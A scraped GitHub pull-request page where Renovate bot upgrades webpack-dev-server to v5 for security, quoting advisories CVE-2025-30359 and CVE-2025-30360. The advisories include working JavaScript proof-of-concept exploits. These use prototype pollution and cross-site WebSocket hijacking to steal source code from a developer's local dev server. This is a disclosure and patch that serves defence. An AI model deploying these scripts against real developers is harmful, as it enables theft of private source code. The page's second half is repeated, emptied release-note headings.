NotificationsYou must be signed in to change notification settings
Fork3.9k
Star21.3k

chore(deps): update dependency webpack-dev-server to v5 [security]#8224

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to ourterms of service andprivacy statement. We’ll occasionally send you account related emails.

Already on GitHub?Sign in to your account

Jump to bottom

Open

renovate wants to merge1 commit intomain

base:main

Choose a base branch

fromrenovate/npm-webpack-dev-server-vulnerability

Open

chore(deps): update dependency webpack-dev-server to v5 [security]#8224

renovate wants to merge1 commit intomainfromrenovate/npm-webpack-dev-server-vulnerability

+1 −1

Conversation

Copy link

Contributor

renovatebot commentedJun 6, 2025•
edited
Loading

Note: This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
webpack-dev-server	`^4.0.0` ->`^5.2.1`

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject<script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By usingFunction::toString against the values in__webpack_modules__, the attacker can get the source code.

PoC

Downloadreproduction.zip and extract it
Runnpm i
Runnpx webpack-dev-server
Openhttps://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.

The script in the POC site is:

letmoduleListconstonHandlerSet=(handler)=>{console.log('h',handler)moduleList=handler.require.m}constoriginalArrayForEach=Array.prototype.forEachArray.prototype.forEach=functionforEach(callback,thisArg){callback((handler)=>{onHandlerSet(handler)})originalArrayForEach.call(this,callback,thisArg)Array.prototype.forEach=originalArrayForEach}constscript=document.createElement('script')script.src='http://localhost:8080/main.js'script.addEventListener('load',()=>{console.log(moduleList)for(constkeyinmoduleList){constp=document.createElement('p')consttitle=document.createElement('strong')title.textContent=keyconstcode=document.createElement('code')code.textContent=moduleList[key].toString()p.append(title,':',document.createElement('br'),code)document.body.appendChild(p)}})document.head.appendChild(script)

This script uses the function generated byrenderRequire.

// The require functionfunction__webpack_require__(moduleId){// Check if module is in cachevarcachedModule=__webpack_module_cache__[moduleId];if(cachedModule!==undefined){returncachedModule.exports;}// Create a new module (and put it into the cache)varmodule=__webpack_module_cache__[moduleId]={// no module.id needed// no module.loaded neededexports:{}};// Execute the module functionvarexecOptions={id:moduleId,module:module,factory:__webpack_modules__[moduleId],require:__webpack_require__};__webpack_require__.i.forEach(function(handler){handler(execOptions);});module=execOptions.module;execOptions.factory.call(module.exports,module,module.exports,execOptions.require);// Return the exports of the modulereturnmodule.exports;}

Especially, it uses the fact thatArray::forEach is called for__webpack_require__.i andexecOptions contains__webpack_require__.
It uses prototype pollution againstArray::forEach to extract__webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you useoutput.iife: false and access a malicious web site.

Details

Whenoutput.iife: false is set, some global variables for the webpack runtime are declared on thewindow object (e.g.__webpack_modules__).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject<script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on thewindow object.
By usingFunction::toString against the values in__webpack_modules__, the attacker can get the source code.

I pointed outoutput.iife: false, but if there are other options that makes the webpack runtime variables to be declared on thewindow object, the same will apply for those cases.

PoC

Downloadreproduction.zip and extract it
Runnpm i
Runnpx webpack-dev-server
Openhttps://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
Open the devtools console.
You can see the content ofsrc/index.js and other scripts loaded.

The script in the POC site is:

constscript=document.createElement('script')script.src='http://localhost:8080/main.js'script.addEventListener('load',()=>{for(constmoduleinwindow.__webpack_modules__){console.log(`${module}:`,window.__webpack_modules__[module].toString())}})document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that hasoutput.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

TheOrigin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported byCVE-2018-14732.
But webpack-dev-server always allows IP addressOrigin headers.
https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127
This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described inthe article linked fromCVE-2018-14732, the attacker get the source code.

related commit:webpack/webpack-dev-server@72efaab (note thatcheckHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due tothe non-HTTPS private access blocking feature.

PoC

Downloadreproduction.zip and extract it
Runnpm i
Runnpx webpack-dev-server
Openhttp://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
Editsrc/index.js in the extracted directory
You can see the content ofsrc/index.js

The script in the POC site is:

window.webpackHotUpdate=(...args)=>{console.log(...args);for(iinargs[1]){document.body.innerText=args[1][i].toString()+document.body.innerTextconsole.log(args[1][i])}}letparams=newURLSearchParams(window.location.search);lettarget=newURL(params.get('target')||'http://127.0.0.1:8080');letfile=params.get('file')letwsProtocol=target.protocol==='http:' ?'ws' :'wss';letwsPort=target.port;varcurrentHash='';varcurrentHash2='';letwsTarget=`${wsProtocol}://${target.hostname}:${wsPort}/ws`;ws=newWebSocket(wsTarget);ws.onmessage=event=>{console.log(event.data);if(event.data.match('"type":"ok"')){s=document.createElement('script');s.src=`${target}${file}.${currentHash2}.hot-update.js`;document.body.appendChild(s)}r=event.data.match(/"([0-9a-f]{20})"/);if(r!==null){currentHash2=currentHash;currentHash=r[1];console.log(currentHash,currentHash2);}}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

Movatterモバイル変換

Uh oh!

chore(deps): update dependency webpack-dev-server to v5 [security]#8224

Are you sure you want to change the base?

chore(deps): update dependency webpack-dev-server to v5 [security]#8224

Conversation

renovatebot commentedJun 6, 2025• editedLoading Uh oh!There was an error while loading.Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Release Notes

Security

Bug Fixes

Features

Bug Fixes

Features

Bug Fixes

5.0.4 (2024-03-19)

Bug Fixes

5.0.3 (2024-03-12)

Bug Fixes

5.0.2 (2024-02-16)

Bug Fixes

5.0.1 (2024-02-13)

Bug Fixes

Security

Bug Fixes

Features

Bug Fixes

5.0.4 (2024-03-19)

Bug Fixes

5.0.3 (2024-03-12)

Bug Fixes

5.0.2 (2024-02-16)

Bug Fixes

5.0.1 (2024-02-13)

Bug Fixes

Features

Bug Fixes

5.0.4 (2024-03-19)

Bug Fixes

5.0.3 (2024-03-12)

Bug Fixes

5.0.2 (2024-02-16)

Bug Fixes

5.0.1 (2024-02-13)

Bug Fixes

Features

Bug Fixes

5.0.4 (2024-03-19)

Bug Fixes

5.0.3 (2024-03-12)

Bug Fixes

5.0.2 (2024-02-16)

Bug Fixes

5.0.1 (2024-02-13)

Bug Fixes

Features

Bug Fixes

5.0.4 (2024-03-19)

Bug Fixes

5.0.3 (2024-03-12)

Bug Fixes

5.0.2 (2024-02-16)

Bug Fixes

5.0.1 (2024-02-13)

Bug Fixes

4.15.2 (2024-03-20)

Bug Fixes

renovatebot commentedJun 6, 2025•
edited
Loading